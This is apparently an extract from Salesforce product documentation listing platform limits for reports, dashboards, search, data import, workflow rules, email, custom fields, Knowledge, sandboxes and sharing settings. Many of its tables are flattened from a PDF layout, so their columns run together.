• In a joined report, each block can have up to 100 columns. A joined report can have up to 5 blocks.

• You can add up to 10 custom summary formulas to each block in a joined report. A joined report can have a total of
50 custom summary formulas.

• Each joined report can have up to 10 cross-block custom summary formulas.

• When you filter on standard long text area fields, such as Description or Solution Details, only the first 1000 characters
of the field are searched for matches in reports.

• Only the first 254 characters in a rich text area or a long text area are displayed in a report.

• Summary fields on tabular, summary, and matrix reports can display up to 21-digits.

• Reports can’t be filtered on custom long text area fields.

• It’s not possible to filter on bucket fields.

• Joined reports require that the new user interface theme is enabled. Users without the new theme are unable to create,
edit, or run joined reports.

• Forecast reports include only opportunities that are set to close within the forecast period, except those assigned to
the Omitted forecast category.

• Internet Explorer 6 is not supported for joined reports.
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Dashboard Limits

• A dashboard filter can have up to 50 options. By default, 10 options are enabled. Contact salesforce.com to extend
your limit.

• Each dashboard can have up to 20 components.

• A dashboard table or chart can display up to 20 photos.

• You must wait at least one minute between dashboard refreshes.

Report Type Limits

• A custom report type can contain up to 60 object references. For example, if you select the maximum limit of four
object relationships for a report type, then you could select fields via lookup from an additional 56 objects. However,
users will receive an error message if they run a report from a custom report type and the report contains columns
from more than 20 different objects.

• You can add up to 1000 fields to each custom report type.

Analytic Snapshot Limits

• The maximum number of rows you can insert into a custom object is 2,000.

• The maximum number of runs you can store is 200.

• The maximum number of source report columns you can map to target fields is 100.

Filtering Limits

Only the first 255 characters in a custom text field count for filtering purposes.

List View Limits

• Only the first 255 characters are shown for custom long text area fields in list views.

See Also:
Analytics Limits Per Edition
Salesforce Features and Edition Limits

SEARCH LIMITS

File Search Limits
Search lets you find articles, documents, products, solutions, and Chatter feeds, files, groups, and people in your organization.

Search supports the following file extensions and maximum file sizes.
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Maximum SizeFile ExtensionsFile Type

5,120 KB
.htm

HTML (only the text within a <body>
tag)

.html

.xhtml

25,600 KB.pdfPDF

25,600 KB
.pot

PPT

.pps

.ppt

5,120 KB.rtfRTF

5,120 KB
.c

Text

.cpp

.css

.csv

.ini

.java

.log

.sql

.txt

25,600 KB
.doc

Word

.dot

5,120 KB, or a maximum cell limit of
100,000 cells

.xls

.xlt

XLS

5,120 KB.xmlXML

See Also:
Picklist Search Limits

Picklist Search Limits
When sorting search results for a particular object, you can’t click on column headings for multi-select picklist fields because
you can’t sort the multi-select picklist field type..
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SALESFORCE APPLICATION LIMITS

ACCOUNT LIMITS

Import Limits for Accounts and Records
You can import data from ACT!, Outlook, and any program that can save data in the CSV (comma-separated values) format,
such as Excel or GoldMine.

Users with accessImport record limitType of record

All users500 at a timeBusiness accounts and contacts owned
by you

Administrators;

Users with the “Modify All Data”
permission

50,000 at a timeBusiness accounts and contacts owned
by different users

All users50,000 at a timePerson accounts owned by you

Administrators;

Users with the “Import Person Accounts”
permission

50,000 at a timePerson accounts owned by different users

Administrators;

Users with “Read”, “Create”, and “Edit”
on leads and the “Import Leads”
permission

50,000 at a timeLeads

Administrators;

Marketing users (or users with the
“Import Leads” permission and the

50,000 for importing leads as new
campaign members and updating the
status of existing campaign members.

Campaign members

“Edit” permission on campaigns) can
import new leads as campaign members.
Users also need the “Read” permission
on contacts to use the campaign update
wizard to make existing leads and
contacts campaign members.

Administrators;

Users with the “Modify All Data”
permission

50,000 at a timeCustom objects
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Users with accessImport record limitType of record

Administrators;

Users with the “Import Solutions”
permission

50,000 at a timeSolutions

These records cannot be imported via the import wizards.Assets

Cases

Campaigns

Contracts

Documents

Opportunities

Products

Your import file cannot exceed 100MB in size, and each record in the file cannot be bigger than 400KB. In addition, each
imported note and each imported description cannot exceed 32KB. Descriptions longer than 32KB are truncated.

See Also:
Limits for Person and Business Accounts

Limits for Person and Business Accounts
If your organization uses person accounts, the Account Fields page lists both person account and business account fields.
Person accounts use a combination of account and contact fields. The following contact fields are available for person accounts,
but not for business accounts.

• Fields in the Account Standard Fields list that display with a person account icon.
• Fields in the Contact Custom Fields & Relationships list.

APPROVALS AND WORKFLOW LIMITS

General Workflow and Approvals Limits
Workflows and approvals automate frequent tasks like emails and record updates.
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Workflow and Approval Limits per Edition

Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Workflow and
Approvals Limits

For Enterprise, Developer, and Unlimited
Editions, each approval process can have up
to:

N/AN/AN/AN/AApproval Processes

• 15 steps per process
• 25 approvers per step

Each organization can have up to:

• 500 approval processes per object
• 1,000 processes per organization

Approval request comments are limited to
4,000 characters. In Chinese, Japanese, or
Korean, the limit is 1,333 characters.

N/AN/AN/AN/AApproval Request
Comments:
Maximum Number
of Characters

For Enterprise, Developer, and Unlimited
Editions, each workflow rule and approval
process can have:

N/AN/AN/AN/AWorkflow Rules
and Approval
Processes

• 10 time triggers
• 40 immediate actions
• 40 time-dependent actions per time

trigger

Note that for both immediate and
time-dependent actions, there can be no
more than:

• 10 email alerts
• 10 tasks
• 10 field updates
• 10 outbound messages

1,00050500250

(Workflow is
available as

N/AN/AN/AWorkflow Time
Triggers Per Hour

an add-on
feature for
Professional
Edition.)

1,000 per
standard

1,000 per
standard

1,000 per
standard

N/AN/AN/AN/AWorkflow Emails
Per Day

Salesforce
license

2,000,000
per
organization

Salesforce
license

2,000,000 per
organization

Salesforce
license

2,000,000
per
organization
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Character Limits for Approval Request Comments

Approval request comments are limited to 4,000 characters. In Chinese, Japanese, or Korean, the limit is 1,333 characters.

Rules Limits

Different types of rules can have restrictions, depending on your Salesforce edition. The following table shows the restrictions
for each edition.

Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Restrictions

50 per object50 per object50 per object50 per objectN/AN/AN/AActive Rules

(Limits apply
to any
combination
of active
workflow,
assignment,
auto-response,
and escalation
rules.

300 per object

1,000 per
organization

300 per object

1,000 per
organization

300 per object

1,000 per
organization

300 per object

1,000 per
organization

N/AN/AN/ATotal Rules
Allowed

(Limits apply
to any
combination
of workflow,
assignment,
auto-response,
and escalation
rules, both
active and
inactive.)

For Professional, Enterprise, Developer, and Unlimited
Editions, each assignment, auto-response, and escalation rule
can have:

N/AN/AN/AAssignment,
Auto-response,
and
Escalation
Rules

• 3,000 rule entries
• 300 formula criteria rule entries
• 25 filter criteria per rule entry

200200200200N/AN/AN/ATotal Actions
Allowed Per
Rule
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CAMPAIGN, LEAD, AND CONTACT LIMITS

Limits for Adding Contacts or Leads to a Campaign
A campaign is an outbound marketing project like a direct mail program, seminar, print advertisement, email, or other type
of marketing initiative.

The following limits apply when you add existing customers (contacts) or prospective customers (leads) to a campaign.

Table 4: Limits for Adding Contacts

Maximum Number of RecordsAdding Contacts From

50,000 per reportReport

50,000 per imported fileFile in csv format

250 per list pageList view

1Contact detail page

Table 5: Limits for Adding Leads

Maximum Number of RecordsAdding Leads From

50,000 per reportReport

50,000 per imported fileFile in csv format

250 per list pageList view

1Contact detail page

Campaign Influence Time Frame Limits
The Campaign Influence Time Frame specifies the maximum number of days during which a campaign is considered influential.

The maximum campaign influence time frame is 9,999 days.
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Campaign Hierarchy Limits
Campaign hierarchies help you analyze and report on the health of related campaigns. By associating campaigns with one
another using a lookup relationship, you can group campaigns within a specific marketing program or initiative.

A hierarchy can contain a maximum of five levels. Each campaign can have only one parent campaign but an unlimited number
of sibling campaigns.

Contact Limits
Contacts are the people associated with business accounts that are tracked in Salesforce. Each contact includes various kinds
of information, such as phone numbers, addresses, titles, and roles in a deal.

Limits for Deleting Contacts

You can’t delete contacts associated with the following items:

• Cases
• Contracts
• Service contracts
• Partner users
• Assets with cases
• An active self-service user
• An active customer portal user

Sharing and Access Limits for Contacts

• You cannot restrict access to contacts beyond your organization's default access levels.
• You must have at least read access to the contacts and leads you invite to an event. You must have at least “Add Events”

on a resource to invite it to an event.
• Contacts that are not linked to an account are always private, regardless of your organization’s sharing model. Only the

owner of the contact and administrators can view it. Sharing rules and workflow rules do not apply to private contacts. If
your organization uses divisions, private contacts always belong to the global division.

• If a recipient does not have access to the account, you cannot share the contact unless you also have permission to share
the account.

• Contact sharing is not available for organizations that have territory management or person accounts.

Contact History Limits

• Modifications to the related lists for a contact are not tracked in the contact history.
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PRODUCTS, PRICE BOOKS, AND SCHEDULES LIMITS

Schedules Limits
Schedules can be established on a product and on individual line items (opportunity products) on an opportunity.

Your Salesforce administrator determines which types of schedules your organization can use: quantity schedules, revenue
schedules, or both. The administrator also specifies which types of schedules can be established for each separated product.

If schedules are referenced in Apex, only one of the schedule types (quantity or revenue) can be disabled. For example, if Apex
references the schedule object (represented as OpportunityLineItemSchedule in the code), one of the schedule types
can be disabled, but not both.

Quote Limits
A quote is a record showing proposed prices for products and services. You create a quote from an opportunity and its products.

Quote Template Limits

In some cases, a field may not appear on the quote templates palette or on a PDF created from a template.

• If a user is unable to view or update a field because of field-level security settings, that field won't appear on PDFs created
from a template, even if the template includes that field. Read-only fields will appear on PDFs.

• A field that appears on a quote page layout but does not have a value for a given quote will appear on the quote templates
palette, but won't appear on PDFs created from that quote.

• Quote line item fields that don't contain data won't appear as columns in a list when a PDF is created, even if the template
includes that field. For example, if no quote line items offer a discount, the Discount column won't appear, even if the
list includes the Discount field.

• If a related list is not included on a quote page layout, it won't appear on the template palette or any PDFs for quotes that
use that page layout.

Quote PDF Limits

Text fields displayed in a related list in a quote PDF are truncated to less than 256 characters. This limitation occurs on rich
text area fields, other types of text fields, standard fields, and custom fields.
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Visual Workflow Limits
Visual Workflow allows administrators to build applications, known as flows, that step users through screens for collecting
that step users through screens for collecting and updating data.

General Visual Workflow Limits
• Users can only run flows that have an active version. If the flow you embed doesn't have an active version, users see an

error message. If the flow you embed includes a subflow element, the flow that is referenced and called by the subflow
element must have an active version.

• You can't redirect flow users to a URL that’s external to your Salesforce organization.
• When making a flow available to site or portal users, be sure to point them to the URL of the Visualforce page that contains

the embedded flow, not to the URL of the flow itself. Site and portal users don’t have the privileges to run flows directly.
• If you plan to deploy a flow using change sets, you must account for limitations in migration support. Make sure your flows

reference only fields and components available in change sets.
• You can only include one version of a flow in a change set.
• You can’t run flows if you exceed your organization's Force.com sites limits or Apex execution governors and limits.

Cloud Designer Limits
• The Cloud Flow Designer can’t open flows installed from managed packages.
• Flows created in the Cloud Flow Designer can be included in both change sets and packages. The recipient organization

of either the change set or package must have Visual Workflow enabled.

Packaged Flow Limits
• Flows can’t be included in package patches.
• If you plan to deploy a flow using packages, you must account for limitations in migration support. Make sure your flows

reference only packageable components and fields.
• If you install a package containing multiple flow versions in a fresh destination organization, only the latest flow version

included in the package is deployed.
• You can’t delete a flow from an installed package. To remove a packaged flow from your organization, you must first

deactivate it, wait 12 hours, then uninstall the package.
• If you have multiple versions of a flow installed from multiple unmanaged packages, you can’t remove only one version by

uninstalling its package. Uninstalling a package—managed or unmanaged—that contains a single version of the flow
removes the entire flow, including all versions.

• If you install a flow from an unmanaged package that has the same name but a different version number as a flow already
in your organization, the newly-installed flow becomes the latest version of the existing flow. However, if the packaged
flow has the same name and version number as a flow already in your organization, the package install will fail. You can’t
overwrite a flow.

• You can only package active flows. The active version of the flow is determined when you click to upload a package version.
The upload fails if there aren’t any active versions of the flow.

• In a development organization, you can’t delete a flow or flow version once you’ve uploaded it to a released or beta managed
package.

• You can’t delete flow components from Managed - Beta package installations in development organizations.
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SALESFORCE ADMINISTRATION AND SUPPORT LIMITS

Chatter Answers Limits
Chatter Answers integrates Cases, Answers, Force.com Sites, Customer Portal, and Salesforce Knowledge into a Web
community.

The following limits apply to Chatter Answers.

• A question in Chatter Answers can receive up to 500 replies.

• When customizing Customer Portal, Answers supports all tab styles and only the following page styles:

◊ Page Background

◊ Text

◊ Link

◊ Link Hover

Concurrent Usage Limits
To ensure that resources are available for all Salesforce users, limits are placed on the number of long-running Web requests
that one organization can send at the same time. Salesforce monitors the number of concurrent requests issued by all users
logged in to your organization, and compares that number against the maximum limit. In this way, the number of concurrent
requests is kept below the maximum limit. The limit ensures that resources are available uniformly to all organizations and
prevents deliberate or accidental over-consumption by any one organization.

If too many requests are issued by users in your organization, you may have to wait until one of them has finished before you
can perform your task. For example, assume that MyCorporation has 100,000 users. At 9:00 AM, each user requests a report
that contains 200,000 records. Salesforce.com starts to run the report for all users until the maximum number of concurrent
requests has been met. At that point, Salesforce.com refuses to take any additional requests until some of the reports have
completed.

Similar limits are placed on requests issued from the API.
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CUSTOM OBJECT LIMITS

Custom Fields Allowed Per Object
The number of custom fields allowed per object varies according to your Salesforce Edition. The maximum number of activities,
long text area fields, rich text area fields, relationship fields, and roll-up summary fields varies as well. The following table
shows the maximum limits for each custom field type and edition.

Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Custom Field
Limits

10010010020No additional
limit

No additional
limit

No additional
limit

Activities

There are no limits to the number of rich text area and long text area fields that an object can contain, although
your Edition’s limit for the total number of custom fields allowed on an object, regardless of field type, applies.

Long Text
Area Fields

Rich Text
Area Fields

Each object can contain a total of 1.6 million characters across long text area and rich text area fields. The
default character limit for long text area and rich text area fields is 32,768 characters. A long text area or rich
text area field needs to contain at least 256 characters.

The maximum size of an image that can be uploaded in a rich text area field is 1 MB.

252525252525No additional
limit

Relationship
Fields

101010101010No additional
limit

Roll-up
Summary
Fields

Standard Picklist Limits
Picklists are customized selection lists that let users pick values from a predefined list of entries.

The maximum number of entries you can have in a picklist is determined by the total number of characters allowed in the
picklist, which is 15,000 characters. Note that each entry includes a linebreak and a return character that are not visible. These
two additional characters per entry are counted as part of the 15,000 character limit.

For standard picklists, entries can be up to 40 characters, not including linebreaks and returns. For standard multi-select
picklists, the total number of characters for all entries cannot exceed 255.

For standard picklists in organizations that use record types or the Translation Workbench, you can have an unlimited number
of entries with the following exceptions for special picklists.
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Maximum Number of EntriesPicklist Field

100Lead Status

100Task Status

50Task Priority

100Case Status

50Case Priority

100Opportunity Stage

Custom Picklist Limits
Picklists are customized selection lists that let users pick values from a predefined list of entries.

Within the 15,000 total character limit, custom picklists can have:

• Up to 1,000 entries

• Up to 255 characters per entry

Custom multi-select picklists can have:

• Up to 150 values

• Up to 40 characters per value

Note that for multi-select picklists, users can select up to 100 values at a time on a record.

Customer Portal Limits
A Salesforce Customer Portal provides an online support channel for your customers—allowing them to resolve their inquiries
without contacting a customer service representative.

Contact salesforce.com for information about the number of Customer Portals and Customer Portal user licenses you can
activate.

Custom Object Limits in Customer Portals
The following limits apply to custom objects in Customer Portals.

• The maximum number of custom objects you can include in a Customer Portal is determined by the total number of
custom objects your Edition allows.

• Also, user licenses control the number of custom objects a portal user can see in a Customer Portal. For information,
contact salesforce.com.

Portal Users Limits
The following limits apply to portal users.
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• Portal users without a Salesforce CRM Content feature license can download, rate, comment on, and subscribe to content
if they have the “View Content on Portals” user permission. They cannot view potentially sensitive data such as usernames
and download, version, and subscriber history. The content delivery feature is not available to portal users.

• Portal users with a Salesforce CRM Content feature license can access all Salesforce CRM Content features granted by
their library permission(s), including contributing content, moving and sharing content among libraries, and deleting
content. They can also view Salesforce CRM Content reports. The content delivery feature is not available to portal users.

• The name of your portal must be unique for your organization and not already in use by a Customer Portal or partner
portal. Furthermore, an error may occur if you name a Customer Portal “partner portal” Customer Portal

• You can’t report on roles for high-volume portal users because they don’t have roles.
• High-volume portal users can’t be added to teams.
• Customer Portal users can't view the tags section of a page, even if it is included in a page layout.

Custom Settings Limits
Custom settings are similar to custom objects and enable application developers to create custom sets of data, as well as create
and associate custom data for an organization, profile, or specific user.

You can access custom settings from formula fields, validation rules, Apex, and the SOAP API.

The following limits apply to the cached data amount and custom settings.

• The total amount of cached data allowed for your organization is the lesser of these two values:

◊ 10 MB
◊ 1 MB multiplied by the number of full-featured user licenses in your organization

For example, if your organization has three full licenses, you have 3 MB of custom setting storage. If your organization
has 20 full licenses, you have 10 MB of storage.

Data Import Limits
The following limits apply to data imported using Data Loader.

Only dates within a certain range are valid. The earliest valid date is 1700-01-01T00:00:00Z GMT, or just after midnight on
January 1, 1700. The latest valid date is 4000-12-31T00:00:00Z GMT, or just after midnight on December 31, 4000. These
values are offset by your time zone. For example, in the Pacific time zone, the earliest valid date is 1699-12-31T16:00:00, or
4:00 PM on December 31, 1699.
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EMAIL LIMITS

General Email Limits
There’s no limit on sending individual emails to contacts, leads, person accounts, and users in your organization directly from
account, contact, lead, opportunity, case, campaign, or custom object pages.

Using the API or Apex, you can send single emails to a maximum of 1,000 external email addresses per day based on Greenwich
Mean Time (GMT). Single emails sent using the Salesforce application don't count toward this limit. There’s no limit on
sending individual emails to contacts, leads, person accounts, and users in your organization directly from account, contact,
lead, opportunity, case, campaign, or custom object pages.

Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

384 KB for
text email
templates

Email Templates:
Maximum Size

• 384 KB for text, HTML, and custom HTML templates

• 1 MB for Visualforce templates

For all editions:Email to Salesforce
• Email body truncation size: 32 KB

• Maximum number of email activities created for each email received: 50

• Maximum size of a single file attachment: 5 MB

• Total maximum size of file attachments: 10 MB

Number of
user licenses

Number of
user licenses

Number of
user licenses

Number of
user licenses

N/AN/AN/AEmail Services: Maximum
Number of Email
Messages Processed multiplied

by 1,000, up
multiplied
by 1,000, up

multiplied
by 1,000, up

multiplied
by 1,000, up

to a dailyto a dailyto a dailyto a daily
maximum of
1,000,000

maximum of
1,000,000

maximum of
1,000,000

maximum of
1,000,000

10 MB110 MB110 MB110 MB1N/AN/AN/AEmail Services: Maximum
Size of Email Message
(Body and Attachments)

5 MB for
file

5 MB for
file

5 MB for
file

5 MB for
file

N/AN/AN/AEmail-to-Case: Maximum
Number of Emails
Converted per Day attachments.

2 GB for
attachments.
2 GB for

attachments.
2 GB for

attachments.
2 GB for

feed
attachments.

feed
attachments.

feed
attachments.

feed
attachments.
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Developer
Edition

Unlimited
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Feature

1,0001,0001,0001,0001,0001,0001,000Extended Mail Merge:
Maximum Number of
Records

1 MB1 MB1 MB1 MB1 MB1 MB1 MBExtended Mail Merge:
Maximum Total Size of
Selected Templates

For Group, Professional, Enterprise, Unlimited, and Developer
Editions:

N/AN/AMerge Field:
Case.Email_Thread

• Maximum number of emails: 200

• Email body truncation size: 32 KB

10 MB10 MB10 MB10 MBN/AN/AN/AOn-Demand
Email-to-Case: Maximum
Email Attachment Size

Number of
user licenses

Number of
user licenses

Number of
user licenses

Number of
user licenses

N/AN/AN/AOn-Demand
Email-to-Case: Maximum

multipliedmultipliedmultipliedmultipliedNumber of Email
Messages Processed

(Counts toward limit for
Email Services)

by 1,000, up
to a daily
maximum of
1,000,000

by 1,000, up
to a daily
maximum of
1,000,000

by 1,000, up
to a daily
maximum of
1,000,000

by 1,000, up
to a daily
maximum of
1,000,000

See Also:
Mass Email Limits
Daily Limits for Workflow Emails

Mass Email Limits
You can send mass email to a maximum of 1,000 external email addresses per day per organization based on Greenwich Mean
Time (GMT). The maximum number of external addresses you can include in each mass email depends on your edition:

External Address Limit per Mass EmailEdition

Mass email not availablePersonal, Contact Manager, and Group Editions

250Professional Edition

500Enterprise Edition

1,000Unlimited Edition

The following additional limits apply to mass emails.
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• The single and mass email limits don't take unique addresses into account. For example, if you have johndoe@example.com
in your email 10 times, that counts as 10 against the limit.

• You can send an unlimited amount of email to your organization’s internal users, which includes portal users.
• In Developer Edition organizations and organizations evaluating Salesforce during a trial period, your organization can

send mass email to no more than 10 external email addresses per day. This lower limit does not apply if your organization
was created before the Winter '12 release and already had mass email enabled with a higher limit.

• You can’t send a mass email using a Visualforce email template.

Daily Limits for Workflow Emails
The daily limit for emails sent from workflow and approval-related email alerts is 1,000 per standard Salesforce license per
organization. The overall organization limit is 2,000,000. When the daily limit is reached, a warning email goes out to the
default workflow user. If the default workflow user isn't set, then the warning email is sent to an active system administrator.

The limit restriction is based on activity in the 24-hour period starting and ending at midnight GMT. Adding or removing
a user license immediately adjusts the limit's total. If you send an email alert to a group, every recipient in that group counts
against your daily workflow email limit.

After your organization has reached its daily workflow email limit:

• Any emails in the workflow queue left over and not sent that day are discarded. Salesforce doesn't try to resend them later.
• If a workflow rule with an action and an email alert is triggered, only the email action is blocked.
• Final approval, final rejection, approval, rejection, and recall email actions are blocked.
• An error message is added to the debug log.

The following items don't count against the workflow email limit:

• Approval notification emails
• Task assignment notifications
• Lead assignment rules notifications
• Case assignment rules notifications
• Case escalation rules notifications
• Force.com sites usage alerts

Field Limits
Encrypted Field Limits
The following limits apply to encrypted fields.

• Encrypted fields are not available for use in filters such as list views, reports, roll-up summary fields, and rule filters.
• You can use encrypted fields in email templates but the value is always masked regardless of whether you have the “View

Encrypted Data” permission.
• Only the <apex:outputField> component supports presenting encrypted fields in Visualforce pages.

Formula and Merge Field Limits
When working with merge fields, you can’t reference

• Merge fields for objects related to activities. For example, merge fields for contacts and accounts are not available in task
and event formulas.
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• Record owner merge fields for any object. For example, the opportunity owner’s Role merge field is not available in
opportunity formulas.

• The $RecordType global variable—it only resolves to the record containing the formula, not the record to which the
formula spans. Starting with the Spring ’13 release, when you create a new formula the $RecordType global variable is
only available for default value formulas.

Validation rules can’t reference merge fields for:

• Auto number fields, such as Requisition Number

• Compound fields, such as addresses, first and last names, dependent picklists, and dependent lookups

Note:  Validation rules can reference merge fields individual address fields, such as Billing City.

• Campaign statistic fields, including statistics for individual campaigns and campaign hierarchies

Validation rule formulas don’t or can’t refer to:

• Compound fields, including addresses, first and last names, and dependent picklists and lookups
• Campaign statistic fields, including statistics for individual campaigns and campaign hierarchies
• Merge fields for auto-number or compound address fields such as Mailing Address

Note:  Merge fields for individual address fields, such as Billing City, are OK to use in validation rule formulas.

You can’t create validation rules for relationship group members.

Lookup Filter Limits
Lookup filters are administrator settings that restrict the valid values and lookup dialog results for lookup, master-detail, and
hierarchical relationship fields.

The following limits apply to lookup filters.

• Lookup filter criteria can reference fields on accounts, assets, contacts, entitlements, quotes, service contracts, users, and
custom objects, with the following exceptions:

◊ Relationship fields on activities
◊ System fields that are always read only, such as Created By  and Modified By

◊ Relationship fields that support queues, such as Case Owner and Lead Owner

• Each object can have up to five active required lookup filters and an unlimited number of optional lookup filters. If you
reach the limit of required lookup filters for an object, create optional filters instead and use validation rules to enforce
your business rule when a user saves.

• Lookup filters on currency fields don't convert currencies. For example, if your organization uses multiple currencies and
a lookup filter criteria is Expected Revenue greater than 100000, the lookup shows all records with an
Expected Revenue field value greater than 100,000, regardless of the currency.

• You can’t use special date values, such as “Today” or “This Month,” in lookup filter criteria.
• You can’t delete fields that are referenced in an active lookup filter.
• You can’t change the field type of fields referenced by an active lookup filter.

• Lookup filter criteria cannot reference the following types of fields on the source object:

◊ Autonumber
◊ Encrypted
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◊ Formula
◊ Long text area
◊ Multi-select picklist
◊ Roll-up summary
◊ Text
◊ Text area
◊ URL

• Lookup auto-completion doesn’t work for user lookups with additional drop-down lists. This is primarily for organizations
that have set up either a partner portal or Customer Portal.

• In enhanced list views, you cannot change fields that are referenced by a dependent lookup filter criteria.
• Lookup filters do not support mass owner changes. If your lookup filter criteria reference the Owner field, performing a

mass owner change can result in incorrect values that won't be noticed until you attempt to save the record.
• Lookup filter criteria on Account Name only apply to business accounts, not person accounts. For example, if your lookup

filter criteria is Account Name does not contain book, business accounts with “book” in the name, such as John’s
Bookstore, are not valid, but person accounts with “book” in the name, such as John Booker, are valid and appear in the
lookup dialog for the Account field. If you need to filter on the name for a person account, use the First Name or Last
Name fields instead.

Rich Text Area Field Limits
The mobile application treats rich text area fields like long-text area fields, which don’t support formatted HTML content or
images. The mobile application truncates rich text area fields at 1,000 characters, which includes HTML markup. Administrators
should consider removing rich text area fields from mobile page layouts. If a mobile user edits a rich text area field that contains
an existing text entry longer than 1,000 characters, the mobile application truncates the text in the field.

Roll-Up Summary Field Limits
Roll-up summary fields are not available for mapping lead fields of converted leads.

RULES LIMITS

Limits for Assignment, Auto-Response, and Escalation
Rules

Assignment rules automate lead generation and support processes for an organization. Auto-response rules specify conditions
for sending automatic email responses to lead or case submissions. Escalation rules escalate cases automatically, if they are not
resolved in a certain period of time.

Different types of rules can have restrictions, depending on your Salesforce edition. The following table shows the restrictions
for each edition.

Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Restrictions

50 per object50 per object50 per object50 per objectN/AN/AN/AActive Rules
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Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Restrictions

(Limits apply
to any
combination
of active
workflow,
assignment,
auto-response,
and escalation
rules.

300 per object

1,000 per
organization

300 per object

1,000 per
organization

300 per object

1,000 per
organization

300 per object

1,000 per
organization

N/AN/AN/ATotal Rules
Allowed

(Limits apply
to any
combination
of workflow,
assignment,
auto-response,
and escalation
rules, both
active and
inactive.)

For Professional, Enterprise, Developer, and Unlimited
Editions, each assignment, auto-response, and escalation rule
can have:

N/AN/AN/AAssignment,
Auto-response,
and
Escalation
Rules

• 3,000 rule entries

• 300 formula criteria rule entries

• 25 filter criteria per rule entry

200200200200N/AN/AN/ATotal Actions
Allowed Per
Rule
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SALESFORCE KNOWLEDGE LIMITS

Edition Limits for Salesforce Knowledge
Salesforce Knowledge is a knowledge base for creating and managing content. Customers and partners can access articles, if
Salesforce Knowledge is enabled in the Customer Portal or partner portal.

Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Salesforce
Knowledge Limits

10,000 articlesN/AN/AN/AN/AMaximum number
of articles

100 article typesN/AN/AN/AN/AMaximum number
of article types

500 custom fields per article typeN/AN/AN/AN/AMaximum number
of custom fields per
article type

5 file fieldsN/AN/AN/AN/AMaximum file fields

File fields are counted as attachments and
can be up to 5 MB.

N/AN/AN/AN/AMaximum file field
size

32 KBN/AN/AN/AN/AMaximum rich text
area size

You can have up to 100 links to different
Salesforce Knowledge articles in one rich
text field.

N/AN/AN/AN/AMaximum unique
article references
(links) in a rich text
area field

Article events are tracked for up to 18
months.

N/AN/AN/AN/AArticle history
tracking

16 supported languagesN/AN/AN/AN/AMaximum number
of supported
languages

The import .zip file must meet the
following requirements:

N/AN/AN/AN/AArticle import

• There can only be one .csv file and one
.properties file.

• The .csv file and the .properties file must
be in the root directory.
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Unlimited
Edition

Developer
Edition

Enterprise
Edition

Professional
Edition

Group
Edition

Contact
Manager

Personal
Edition

Salesforce
Knowledge Limits

• The compression process must preserve
the folder and subfolder structure.

• The .zip file can’t exceed 10 MB and
the uncompressed files can’t exceed 100
MB.

• .csv files can’t have more than 10,000
rows, including the header row.
Therefore, you can have a maximum of
9,999 articles and translations.

• .csv file rows can’t exceed 400,000
characters.

• .csv file cells can’t exceed 32 KB.

• Each article in the .csv file can’t have
more than 49 translations.

5 category groups and 3 active category
groups

N/AN/AN/AN/AMaximum number
of data category
groups and active
data category groups

100 categories in a data category groupN/AN/AN/AN/AMaximum number
of categories per
data category group

5 levels in a data category group hierarchyN/AN/AN/AN/AMaximum number
of levels in data
category group
hierarchy

8 data categories from a data category group
assigned to an article

N/AN/AN/AN/AMaximum number
of data categories
from a data category
group assigned to an
article
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SANDBOX LIMITS

General Sandbox and Sandbox Storage Limits
A sandbox is a copy of your organization in a separate environment, you can use for a variety of purposes, such as testing and
training. Sandboxes are completely isolated from your Salesforce production organization and operations you perform in your
sandboxes do not affect your Salesforce production organization.

The following limits apply to sandboxes.

• You can refresh a Full sandbox 29 days after you created or last refreshed it. If you delete a Full sandbox within those 29
days, you need to wait until after the 29 day period, from the date of last refresh or creation, to replace it.

• You can refresh a Configuration Only sandbox (including a Developer sandbox) once per day.

• Enterprise Edition includes a license for 1 Developer sandbox.

• Unlimited Edition includes licenses for 1 Full sandbox, 5 Configuration Only sandboxes, and 15 Developer sandboxes.

• If you need licenses for more sandboxes, contact salesforce.com to order sandboxes for your organization.

The following limits apply to Sandbox storage limits.

• Full copy sandboxes have the same storage limit as your production organization.

• Configuration-only sandboxes have a 500 MB storage limit.

• Developer sandboxes have a 10 MB storage limit.

• Sandboxes don’t send email notifications when storage limits are reached. However, if you reach the storage limit of your
sandbox, you cannot save new data in your sandbox. To check your storage limits, from Setup, click Data Management
> Storage Usage in your sandbox.

SECURITY LIMITS

Organization-Wide Sharing Limits
Administrators can use organization-wide sharing settings to define the default sharing settings for an organization.

The organization-wide sharing default setting can’t be changed for some objects:

• Solutions are always Public Read/Write.
• Service contracts are always Private.
• The ability to view or edit a document, report, or dashboard is based on a user’s access to the folder in which it’s stored.
• Users can only view the forecasts of other users who are placed below them in the role hierarchy, unless forecast sharing

is enabled.
• When a custom object is on the detail side of a master-detail relationship with a standard object, its organization-wide

default is set to Controlled by Parent and it is not editable.
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• The organization-wide default settings can’t be changed from private to public for a custom object if Apex code uses the
sharing entries associated with that object. For example, if Apex code retrieves the users and groups who have sharing
access on a custom object Invoice__c (represented as Invoice__share in the code), you can’t change the object’s
organization-wide sharing setting from private to public.

See Also:
Password Policy Limits

Password Policy Limits
You can set various password and login policies to secure your organization.

User passwords cannot exceed 16,000 bytes.

See Also:
Organization-Wide Sharing Limits

Service Cloud Console Limits
A Service Cloud console is an app that’s designed for users in fast-paced environments who need to find, update, and create
records quickly.

For best performance, we recommend using Internet Explorer 8, 9, or 10 or the latest stable version of Firefox or Google
Chrome when using Live Agent in the Service Cloud console. The follow limits apply to the Service Cloud console.

• If you log in to another Salesforce app while you’re logged in to a Service Cloud console app, you can’t accept new chat
requests.

• In Chatter Answers, administrators can’t customize the FAQ (Frequently Asked Questions) available to customers when
they click Need help?.

• Internet Explorer 8 users receive a security warning if you customize with URLs that don't include https://.

SITE.COM LIMITS

Site Edition Limits
